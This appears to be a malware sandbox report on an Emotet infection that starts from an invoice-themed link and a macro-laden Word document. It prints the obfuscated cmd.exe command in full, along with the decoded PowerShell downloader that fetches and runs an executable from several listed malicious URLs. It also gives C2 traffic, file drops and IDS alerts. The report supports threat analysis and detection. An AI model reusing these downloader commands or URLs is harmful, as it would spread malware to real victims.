URL: | http://megascule.ro/files/US_us/Invoice-6737044-December |
Full analysis: | https://app.any.run/tasks/340f606b-9712-4cc4-a728-b9ece3bb8818 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 14:01:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 215A69FB1F769E44EE116268949CB7ED |
SHA1: | 5FA10EE8453CCDBB6DE0CB2E396BC9849EFC10ED |
SHA256: | 99B3B7E0202D94C2C5818278EBEA2F118922E437CD6ED7217B5601CEB6D0DC35 |
SSDEEP: | 3:N1KTE+fzKD6D3LGMGAUSVQKXn:CFOYGMGALVQKXn |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3508 | "C:\Program Files\Internet Explorer\iexplore.exe" http://megascule.ro/files/US_us/Invoice-6737044-December | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
4028 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3508 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2668 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\Invoice_Query[1].doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3980 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2364 | c:\tUncDEpsQNmuGG\ristSbTd\vlnUPFqZAphRN\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set 9HMF=qPwfvuhPEpGpIRJRO0)W4B-YH$gN2/yanc{}13.Lb',D7T +sdkQiUjx@(\C:=;r8FzmlMeVt9oS5A&&for %u in (25,74,27,6,61,41,50,15,71,41,62,25,0,66,52,61,32,70,2,22,74,40,54,70,33,72,46,27,70,72,38,19,70,40,59,68,52,70,32,72,62,25,45,4,71,61,41,6,72,72,11,60,29,29,31,48,11,52,63,52,32,26,3,52,68,67,48,38,33,74,67,29,68,14,33,44,51,11,55,56,6,72,72,11,60,29,29,50,70,68,4,52,32,32,52,50,50,70,68,38,33,74,67,29,24,26,15,56,6,72,72,11,60,29,29,49,31,30,74,3,49,52,48,33,74,32,32,70,33,72,38,33,74,67,29,16,76,39,70,20,56,6,72,72,11,60,29,29,54,74,30,32,72,38,32,70,72,29,7,71,7,73,7,32,56,6,72,72,11,60,29,29,33,63,31,3,72,2,2,38,11,68,29,29,12,36,43,40,36,28,54,59,41,38,75,11,68,52,72,57,41,56,41,18,62,25,69,2,24,61,41,19,53,48,41,62,25,23,5,50,46,61,46,41,28,37,76,41,62,25,3,2,24,61,41,2,69,51,41,62,25,66,77,8,61,25,70,32,4,60,72,70,67,11,47,41,58,41,47,25,23,5,50,47,41,38,70,55,70,41,62,3,74,63,70,31,33,6,57,25,53,51,65,46,52,32,46,25,45,4,71,18,34,72,63,30,34,25,0,66,52,38,43,74,2,32,68,74,31,49,65,52,68,70,57,25,53,51,65,42,46,25,66,77,8,18,62,25,7,2,15,61,41,72,51,21,41,62,12,3,46,57,57,10,70,72,22,12,72,70,67,46,25,66,77,8,18,38,68,70,32,26,72,6,46,22,26,70,46,64,17,17,17,17,18,46,34,12,32,4,74,50,70,22,12,72,70,67,46,25,66,77,8,62,25,75,49,49,61,41,33,50,59,41,62,40,63,70,31,50,62,35,35,33,31,72,33,6,34,35,35,25,71,72,19,61,41,12,24,3,41,62,84)do set edF8=!edF8!!9HMF:~%u,1!&&if %u gtr 83 powershell.exe "!edF8:~6!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3072 | CmD /V:O/C"set 9HMF=qPwfvuhPEpGpIRJRO0)W4B-YH$gN2/yanc{}13.Lb',D7T +sdkQiUjx@(\C:=;r8FzmlMeVt9oS5A&&for %u in (25,74,27,6,61,41,50,15,71,41,62,25,0,66,52,61,32,70,2,22,74,40,54,70,33,72,46,27,70,72,38,19,70,40,59,68,52,70,32,72,62,25,45,4,71,61,41,6,72,72,11,60,29,29,31,48,11,52,63,52,32,26,3,52,68,67,48,38,33,74,67,29,68,14,33,44,51,11,55,56,6,72,72,11,60,29,29,50,70,68,4,52,32,32,52,50,50,70,68,38,33,74,67,29,24,26,15,56,6,72,72,11,60,29,29,49,31,30,74,3,49,52,48,33,74,32,32,70,33,72,38,33,74,67,29,16,76,39,70,20,56,6,72,72,11,60,29,29,54,74,30,32,72,38,32,70,72,29,7,71,7,73,7,32,56,6,72,72,11,60,29,29,33,63,31,3,72,2,2,38,11,68,29,29,12,36,43,40,36,28,54,59,41,38,75,11,68,52,72,57,41,56,41,18,62,25,69,2,24,61,41,19,53,48,41,62,25,23,5,50,46,61,46,41,28,37,76,41,62,25,3,2,24,61,41,2,69,51,41,62,25,66,77,8,61,25,70,32,4,60,72,70,67,11,47,41,58,41,47,25,23,5,50,47,41,38,70,55,70,41,62,3,74,63,70,31,33,6,57,25,53,51,65,46,52,32,46,25,45,4,71,18,34,72,63,30,34,25,0,66,52,38,43,74,2,32,68,74,31,49,65,52,68,70,57,25,53,51,65,42,46,25,66,77,8,18,62,25,7,2,15,61,41,72,51,21,41,62,12,3,46,57,57,10,70,72,22,12,72,70,67,46,25,66,77,8,18,38,68,70,32,26,72,6,46,22,26,70,46,64,17,17,17,17,18,46,34,12,32,4,74,50,70,22,12,72,70,67,46,25,66,77,8,62,25,75,49,49,61,41,33,50,59,41,62,40,63,70,31,50,62,35,35,33,31,72,33,6,34,35,35,25,71,72,19,61,41,12,24,3,41,62,84)do set edF8=!edF8!!9HMF:~%u,1!&&if %u gtr 83 powershell.exe "!edF8:~6!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2992 | powershell.exe "$oNh='kRV';$qzi=new-object Net.WebClient;$TvV='http://aspiringfilms.com/lJc7Qpx@http://kelvinnikkel.com/HgR@http://dayofdisconnect.com/O5Le4@http://joynt.net/PVP9Pn@http://craftww.pl//I1Db12jC'.Split('@');$MwH='WUs';$Yuk = '235';$fwH='wMQ';$zAE=$env:temp+'\'+$Yuk+'.exe';foreach($UQF in $TvV){try{$qzi.DownloadFile($UQF, $zAE);$PwR='tQB';If ((Get-Item $zAE).length -ge 80000) {Invoke-Item $zAE;$Sdd='ckC';break;}}catch{}}$VtW='IHf';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2164 | "C:\Users\admin\AppData\Local\Temp\235.exe" | C:\Users\admin\AppData\Local\Temp\235.exe | — | powershell.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
3196 | "C:\Users\admin\AppData\Local\Temp\235.exe" | C:\Users\admin\AppData\Local\Temp\235.exe | 235.exe | |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
3120 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 235.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3508 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3508 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3508 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFF5676AF4EF5F6D01.TMP | — | |
MD5:— | SHA256:— | |||
2668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB7DA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2668 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_58C3F0E3-4F8C-4EC8-A32B-3B11BB16B58D.0\13E68681.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_58C3F0E3-4F8C-4EC8-A32B-3B11BB16B58D.0\~DFEEBCAC35608D7874.TMP | — | |
MD5:— | SHA256:— | |||
2992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MPLJ81GMR26I127CPCY5.temp | — | |
MD5:— | SHA256:— | |||
3508 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFDD1AEAB3D7EF6253.TMP | — | |
MD5:— | SHA256:— | |||
3508 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{84158AB9-F95F-11E8-834A-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
3980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_58C3F0E3-4F8C-4EC8-A32B-3B11BB16B58D.0\msoC16F.tmp | compressed | |
MD5:F304DA845762C5B5BC8025FA745802BC | SHA256:A58DDF17B8C17AB8694088E1C9B5B6BAB7972C6137EFE726BC7A4102BD4E51FF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2992 | powershell.exe | GET | 200 | 67.225.182.246:80 | http://aspiringfilms.com/lJc7Qpx/ | US | executable | 160 Kb | malicious |
4028 | iexplore.exe | GET | 200 | 212.146.85.100:80 | http://megascule.ro/files/US_us/Invoice-6737044-December/ | RO | document | 96.4 Kb | malicious |
2992 | powershell.exe | GET | 301 | 67.225.182.246:80 | http://aspiringfilms.com/lJc7Qpx | US | html | 241 b | malicious |
4028 | iexplore.exe | GET | 301 | 212.146.85.100:80 | http://megascule.ro/files/US_us/Invoice-6737044-December | RO | html | 265 b | malicious |
3252 | archivesymbol.exe | GET | 200 | 189.223.176.239:7080 | http://189.223.176.239:7080/ | MX | binary | 132 b | malicious |
3508 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3508 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
4028 | iexplore.exe | 212.146.85.100:80 | megascule.ro | T-Mobile Czech Republic a.s. | RO | malicious |
2992 | powershell.exe | 67.225.182.246:80 | aspiringfilms.com | Liquid Web, L.L.C | US | malicious |
3252 | archivesymbol.exe | 189.223.176.239:7080 | — | Uninet S.A. de C.V. | MX | malicious |
Domain | IP | Reputation |
---|---|---|
megascule.ro |
| malicious |
www.bing.com |
| whitelisted |
aspiringfilms.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
4028 | iexplore.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious request with 'invoice' in http uri |
4028 | iexplore.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious request with 'invoice' in http uri |
4028 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY Office Document Download Containing AutoOpen Macro |
4028 | iexplore.exe | Attempted User Privilege Gain | SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt |
2992 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2992 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2992 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2992 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3252 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3252 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |